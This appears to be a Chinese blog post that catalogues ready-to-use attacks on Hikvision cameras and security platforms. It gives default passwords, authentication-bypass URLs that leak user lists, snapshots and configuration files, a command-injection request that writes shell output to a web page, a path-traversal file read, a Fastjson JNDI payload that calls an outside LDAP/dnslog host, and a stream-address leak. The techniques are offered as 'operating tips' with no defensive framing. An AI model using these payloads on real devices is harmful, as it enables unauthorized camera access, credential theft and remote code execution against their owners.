1.弱口令
操作技巧:
admin:12345/8888888
漏洞版本:大多数设备
2.身份认证绕过漏洞
操作技巧:
http://ip/Security/users?auth=YWRtaW46MTEKYWRtaW46MTEK(获取所有用户列表)
http://ip/onvif-http/snapshot?auth=YWRtaW46MTEK(获取摄像头快照)
http://ip/System/configurationFile?auth=YWRtaW46MTEK(下载摄像机配置文件,通过脚本解密配置文件获得账密信息)
解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor
漏洞版本:大多数设备
3.命令注入漏洞
操作技巧:
PUT /SDK/webLanguage HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 89
<?xml version="1.0" encoding="UTF-8"?>
<language>
$(ifconfig -a > webLib/dd.asp)
</language>
结果存储到了dd.asp中,直接访问dd.asp即可
漏洞版本:大多数设备
4.后台任意文件读取漏洞
操作技巧:
http://ip/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
漏洞版本:流媒体管理服务器 V2.3.5
5.任意文件上传漏洞
操作技巧:
poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc
漏洞版本:
海康威视综合安防系统iVMS-5000
海康威视综合安防系统 iVMS-8700
6.Fastjson远程命令执行漏洞
操作技巧:
POST /bic/ssoService/v1/applyCT HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Content-Type: application/json
Content-Length: 215
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://2vyvoa.dnslog.cn","autoCommit":true},"hfe4zyyzldp":"="}
漏洞版本:大多数设备
7.信息泄露漏洞
操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头
漏洞版本:大多数设备
扫一扫
4780
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
